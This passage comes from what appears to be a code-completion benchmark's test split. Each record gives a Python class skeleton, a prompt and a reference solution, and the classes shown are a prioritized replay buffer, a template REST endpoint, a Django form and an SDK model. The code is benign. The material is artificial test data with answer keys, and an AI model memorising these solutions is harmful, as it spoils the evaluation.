buffer. 
Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n <|body_0|>\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n <|body_1|>\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n <|body_2|>\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n <|body_3|>\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n <|body_4|>\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n<|end_body_0|>\n\n<|body_start_1|>\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n<|end_body_2|>\n\n<|body_start_3|>\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n<|end_body_3|>\n\n<|body_start_4|>\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n<|end_body_4|>\n\n<|body_start_5|>\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n<|end_body_5|>\n", "revision_id": "60e0c3389724460b5b32ba35c89d8838da4d51c9", "skeleton": "<|skeleton|>\nclass PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. 
Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n <|body_0|>\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n <|body_1|>\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n <|body_2|>\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n <|body_3|>\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n <|body_4|>\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] 
= priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n", "source": "the_stack_v2_python_sparse", "source_path": "lrec2022-odinsynth/python/rl_rainbow_implementation.py", "source_repo": "clulab/releases", "split": "test", "star_events_count": 29} {"blob_id": "8e51b0b6bfae44443262781e402c34f42b9914d2", "bodies": ["template = db.Template.find_one(template_name=template_name)\nif not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\nreturn self.make_response({'template': template})", "self.reqparse.add_argument('template', type=str, required=True)\nargs = self.reqparse.parse_args()\ntemplate = db.Template.find_one(template_name=template_name)\nif not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\nchanges = diff(template.template, args['template'])\ntemplate.template = args['template']\ntemplate.is_modified = True\ndb.session.add(template)\ndb.session.commit()\nauditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\nreturn self.make_response('Template {} has been updated'.format(template_name))", "template = db.Template.find_one(template_name=template_name)\nif not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\ndb.session.delete(template)\ndb.session.commit()\nauditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\nreturn self.make_response({'message': 'Template has been deleted', 'templateName': template_name})"], "bodies_text": "<|body_start_0|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n<|end_body_0|>\n\n<|body_start_1|>\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n<|end_body_1|>\n\n<|body_start_2|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', 
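# Hedged sketch of the math behind sample_batch() above, with plain lists
# standing in for the segment trees (same behaviour, O(n) instead of
# O(log n)). Function names are illustrative, not from the original code.
import random

def sample_proportional(priorities, batch_size, alpha=0.6):
    # Stratified sampling: split total priority mass into equal segments and
    # draw one index per segment, as in _sample_proportional() above. The
    # prefix walk stands in for SumSegmentTree.retrieve().
    scaled = [p ** alpha for p in priorities]
    total = sum(scaled)
    segment = total / batch_size
    indices = []
    for i in range(batch_size):
        upper = random.uniform(segment * i, segment * (i + 1))
        acc, idx = 0.0, 0
        while idx < len(scaled) - 1 and acc + scaled[idx] < upper:
            acc += scaled[idx]
            idx += 1
        indices.append(idx)
    return indices, scaled, total

def is_weight(scaled, total, idx, beta=0.4):
    # Importance weight (N * P(i))^-beta, normalised by the largest weight,
    # which belongs to the minimum probability -- hence the min_tree above.
    n = len(scaled)
    max_weight = (min(scaled) / total * n) ** (-beta)
    return (scaled[idx] / total * n) ** (-beta) / max_weight

indices, scaled, total = sample_proportional([1.0, 0.5, 2.0, 0.1], batch_size=2)
weights = [is_weight(scaled, total, i) for i in indices]
assert all(0.0 < w <= 1.0 for w in weights)  # normalisation keeps weights in (0, 1]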
actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n<|end_body_2|>\n", "class_docstring": "", "class_name": "TemplateGet", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TemplateGet:\n\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n <|body_0|>\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n <|body_1|>\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n<|end_body_0|>\n\n<|body_start_1|>\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n<|end_body_1|>\n\n<|body_start_2|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000323", "length_bytes": 4164, "license_type": "permissive", "methods": [{"docstring": "Get a specific template", "name": "get", "signature": "def get(self, template_name)"}, {"docstring": "Update a template", "name": "put", "signature": "def put(self, template_name)"}, {"docstring": "Delete a template", "name": "delete", "signature": "def delete(self, template_name)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002655", "prompt": "Implement the Python class `TemplateGet` described below.\n\nClass description:\nImplement the TemplateGet class.\n\nMethod signatures and docstrings:\n- def get(self, template_name): Get a specific template\n- def put(self, template_name): Update a template\n- def delete(self, template_name): Delete a template", "prompted_full_text": "Implement the Python class `TemplateGet` described below.\n\nClass description:\nImplement the TemplateGet class.\n\nMethod signatures and docstrings:\n- def get(self, template_name): Get a specific template\n- def put(self, template_name): Update a template\n- def delete(self, template_name): Delete a template\n\n<|skeleton|>\nclass TemplateGet:\n\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n <|body_0|>\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n <|body_1|>\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n template = 
db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n<|end_body_0|>\n\n<|body_start_1|>\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n<|end_body_1|>\n\n<|body_start_2|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n<|end_body_2|>\n", "revision_id": "29a26c705381fdba3538b4efedb25b9e09b387ed", "skeleton": "<|skeleton|>\nclass TemplateGet:\n\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n <|body_0|>\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n <|body_1|>\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TemplateGet:\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n", "source": "the_stack_v2_python_sparse", "source_path": "backend/cloud_inquisitor/plugins/views/templates.py", "source_repo": "RiotGames/cloud-inquisitor", "split": "test", "star_events_count": 468} {"blob_id": 
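# Hedged, framework-free sketch of the GET/PUT/DELETE semantics in the
# TemplateGet record above: look up by name, 404 when missing, audit on
# change. The dict store and audit list are stand-ins for the original's
# SQLAlchemy session and auditlog() helper.
HTTP_NOT_FOUND = 404
templates = {}   # template_name -> template body
audit_log = []   # (event, data) tuples

def get_template(name):
    if name not in templates:
        return ('No such template found', HTTP_NOT_FOUND)
    return ({'template': templates[name]}, 200)

def put_template(name, body):
    if name not in templates:
        return ('No such template found', HTTP_NOT_FOUND)
    templates[name] = body
    audit_log.append(('template.update', {'template_name': name}))
    return ('Template {} has been updated'.format(name), 200)

def delete_template(name):
    if name not in templates:
        return ('No such template found', HTTP_NOT_FOUND)
    del templates[name]
    audit_log.append(('template.delete', {'template_name': name}))
    return ({'message': 'Template has been deleted', 'templateName': name}, 200)

templates['base'] = 'hello {name}'
assert put_template('base', 'hi {name}')[1] == 200
assert delete_template('missing')[1] == HTTP_NOT_FOUND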
"47ab5ac4fc8f1707236e4b7c785c21d539943c9c", "bodies": ["super(BaseAddCaseForm, self).__init__(*args, **kwargs)\nif self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)", "productversion = self.cleaned_data.get('productversion')\nsuite = self.cleaned_data.get('suite')\nproduct = self.cleaned_data.get('product')\nif product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\nif product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\nreturn self.cleaned_data"], "bodies_text": "<|body_start_0|>\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n<|end_body_0|>\n\n<|body_start_1|>\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n<|end_body_1|>\n", "class_docstring": "Base form for adding cases.", "class_name": "BaseAddCaseForm", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n <|body_0|>\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n<|end_body_0|>\n\n<|body_start_1|>\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000324", "length_bytes": 16711, "license_type": "permissive", "methods": [{"docstring": "Initialize form; possibly add suite field.", "name": "__init__", "signature": "def __init__(self, *args, **kwargs)"}, {"docstring": "Verify that products all match up.", "name": "clean", "signature": "def clean(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006859", "prompt": "Implement the Python class `BaseAddCaseForm` described below.\n\nClass description:\nBase form for adding cases.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Initialize form; possibly add suite field.\n- def clean(self): Verify that 
products all match up.", "prompted_full_text": "Implement the Python class `BaseAddCaseForm` described below.\n\nClass description:\nBase form for adding cases.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Initialize form; possibly add suite field.\n- def clean(self): Verify that products all match up.\n\n<|skeleton|>\nclass BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n <|body_0|>\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n<|end_body_0|>\n\n<|body_start_1|>\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n<|end_body_1|>\n", "revision_id": "ee54db2fe8ffbf2216d359b7a093b51f2574878e", "skeleton": "<|skeleton|>\nclass BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n <|body_0|>\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n", "source": "the_stack_v2_python_sparse", "source_path": "moztrap/view/manage/cases/forms.py", "source_repo": "isakib/moztrap", "split": "test", "star_events_count": 1} {"blob_id": "be9af56f449fee7bca8ae45631eb110321075705", "bodies": ["self.access_zone = access_zone\nself.cluster = cluster\nself.mount_point = mount_point\nself.name = name\nself.mtype = mtype", "if dictionary is None:\n return None\naccess_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\ncluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if 
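# Hedged sketch of the cross-field check in BaseAddCaseForm.clean() above:
# productversion and suite must both belong to the selected product. Plain
# classes stand in for the Django models, and ValueError stands in for
# forms.ValidationError.
class Product:
    def __init__(self, name):
        self.name = name

class ProductVersion:
    def __init__(self, product):
        self.product = product

class Suite:
    def __init__(self, product):
        self.product = product

def clean(cleaned):
    product = cleaned.get('product')
    productversion = cleaned.get('productversion')
    suite = cleaned.get('suite')
    if product and productversion and productversion.product != product:
        raise ValueError('Must select a version of the correct product.')
    if product and suite and suite.product != product:
        raise ValueError('Must select a suite for the correct product.')
    return cleaned

p, q = Product('A'), Product('B')
clean({'product': p, 'productversion': ProductVersion(p), 'suite': Suite(p)})
try:
    clean({'product': p, 'productversion': ProductVersion(q)})
except ValueError:
    pass  # mismatched product rejected, as in the form's clean()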
dictionary.get('cluster') else None\nmount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\nname = dictionary.get('name')\nmtype = dictionary.get('type')\nreturn cls(access_zone, cluster, mount_point, name, mtype)"], "bodies_text": "<|body_start_0|>\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is", "class_name": "IsilonProtectionSource", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000325", "length_bytes": 3446, "license_type": "permissive", "methods": [{"docstring": "Constructor for the IsilonProtectionSource class", "name": "__init__", "signature": "def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `IsilonProtectionSource` described below.\n\nClass description:\nImplementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\n\nMethod signatures and docstrings:\n- def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None): Constructor for the IsilonProtectionSource class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `IsilonProtectionSource` described below.\n\nClass description:\nImplementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. 
